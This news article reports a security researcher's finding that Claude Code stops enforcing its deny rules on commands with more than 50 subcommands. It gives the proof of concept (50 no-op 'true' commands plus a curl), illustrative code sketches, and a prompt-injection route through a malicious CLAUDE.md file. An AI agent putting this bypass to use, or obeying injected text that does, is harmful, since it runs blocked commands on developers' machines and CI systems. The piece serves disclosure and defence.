Anthropic's Claude Code coding assistant ignores its own deny rules when given 50+ subcommands, creating a potential security vulnerability that could allow malicious code execution.
A security researcher has discovered that Anthropic's Claude Code coding assistant can bypass its own safety mechanisms when given a sufficiently long chain of commands, potentially allowing malicious code execution through prompt injection attacks.
The Vulnerability: Too Many Commands, Too Few Safeguards
The issue stems from a hard-coded limit in Claude Code's security enforcement system. When the AI agent receives more than 50 subcommands in a single request, it stops automatically enforcing its deny rules and instead asks the user for permission.
This behavior is documented in the source code file bashPermissions.ts, which contains a comment referencing internal Anthropic issue CC-643. The code shows that MAX_SUBCOMMANDS_FOR_SECURITY_CHECK is set to 50, with the assumption that "50 is a generous allowance for legitimate usage."
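The reported behavior can be sketched as follows. This is a hedged, illustrative reconstruction, not Anthropic's actual code: only the constant name MAX_SUBCOMMANDS_FOR_SECURITY_CHECK and the 50-subcommand threshold come from the article; the function and its signature are assumptions.

```typescript
// Illustrative sketch of the reported threshold logic (not Anthropic's code).
// Only MAX_SUBCOMMANDS_FOR_SECURITY_CHECK and the value 50 are from the report.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

type Behavior = "allow" | "deny" | "ask";

function checkCommand(subcommands: string[], denyRules: RegExp[]): Behavior {
  if (subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    // Above the threshold, deny rules are skipped entirely and the
    // decision falls back to asking the user -- failing open.
    return "ask";
  }
  return subcommands.some((cmd) => denyRules.some((rule) => rule.test(cmd)))
    ? "deny"
    : "allow";
}
```

The key point is the early return: once the count passes 50, the deny rules are never consulted at all.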
How the Attack Works
Adversa AI's Red Team demonstrated the vulnerability with a simple proof-of-concept attack. They created a bash command that combined 50 no-op "true" subcommands with a single curl subcommand. Since the total of 51 subcommands exceeded the 50-subcommand threshold, Claude Code asked for authorization instead of denying the potentially risky curl command outright.
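The payload described above can be reconstructed like so. This is a sketch under assumptions: the article does not specify the chaining operator or the target URL, so both are hypothetical.

```typescript
// Hypothetical reconstruction of the reported PoC: 50 no-op `true`
// subcommands plus one curl, for 51 subcommands total -- one past the
// 50-subcommand analysis limit. The && operator and URL are assumptions.
const subcommands = [...Array(50).fill("true"), "curl https://attacker.example"];
const payload = subcommands.join(" && ");

console.log(payload);
```

A command built this way looks like build-script noise to a human skimming an approval prompt, which is exactly what makes the prompt-injection scenario below plausible.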
This creates an opening for prompt injection attacks. A malicious CLAUDE.md file could instruct the AI to generate a 50+ subcommand pipeline that appears to be a legitimate build process, but actually includes hidden malicious commands.
Real-World Implications
The vulnerability has several concerning implications for developers:
Developer Workflows: Many developers use Claude Code in --dangerously-skip-permissions mode or automatically approve actions during long coding sessions, meaning they might not notice when the agent asks for permission on the 51st subcommand.
CI/CD Pipelines: Continuous integration and deployment systems that run Claude Code in non-interactive mode could be particularly vulnerable, as there's no human to approve or deny the request.
Security Bypass: The deny rules, which are meant to prevent risky actions like network requests via curl, become ineffective when the subcommand threshold is exceeded.
Anthropic's Internal Fix
Ironically, Anthropic has already developed a solution to this problem. The company's source code contains references to a command parser built on tree-sitter, a widely used open-source parsing library, which appears to handle command parsing more robustly. However, this parser is not yet enabled in public builds of Claude Code.
The Adversa team notes that implementing a fix would be straightforward. A simple one-line change in bashPermissions.ts at line 2174, switching the "behavior" key from "ask" to "deny," would address this particular vulnerability.
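The fail-closed variant the researchers propose can be sketched as follows. This is illustrative only: the function name and shape are assumptions; only the "ask" to "deny" change and the 50-subcommand limit come from the report.

```typescript
// Hedged sketch of the proposed one-line fix: where the current code
// reportedly returns { behavior: "ask" } once a command exceeds the
// subcommand limit, the patched version would return { behavior: "deny" }.
// Function name and shape are hypothetical, not Anthropic's actual code.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

function overLimitFallback(
  subcommandCount: number
): { behavior: "ask" | "deny" } | null {
  if (subcommandCount <= MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    return null; // under the limit: normal deny-rule checking applies
  }
  // Was { behavior: "ask" } -- failing closed denies what can't be analyzed.
  return { behavior: "deny" };
}
```

The design choice here is standard security practice: when a command is too complex to analyze, refuse it rather than delegate the decision to a user who may be rubber-stamping prompts.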
Security Context
This discovery comes amid growing concerns about AI coding assistants and their security implications. The leak of Claude Code's source code has revealed not only this vulnerability but also how much information Anthropic can collect about users and their systems.
The vulnerability highlights a broader challenge in AI security: balancing usability with safety. While 50 subcommands might seem like a reasonable limit for human-authored commands, it creates an unexpected attack vector when AI models generate command sequences.
Regulatory and Compliance Concerns
Adversa argues that this represents a bug in security policy enforcement code with potential regulatory and compliance implications. Organizations using Claude Code for development work may need to reassess their security policies and consider whether additional safeguards are necessary.
Response and Next Steps
Anthropic did not immediately respond to requests for comment about the vulnerability or plans to implement the internal "tree-sitter" parser in public releases.
For now, developers using Claude Code should be aware of this limitation and consider:
- Avoiding --dangerously-skip-permissions mode when possible
- Reviewing long command sequences carefully
- Implementing additional security measures in CI/CD pipelines
- Monitoring for updates from Anthropic regarding this vulnerability
The discovery serves as a reminder that AI coding assistants, while powerful tools, still require careful security consideration and cannot be trusted to enforce their own safety rules under all circumstances.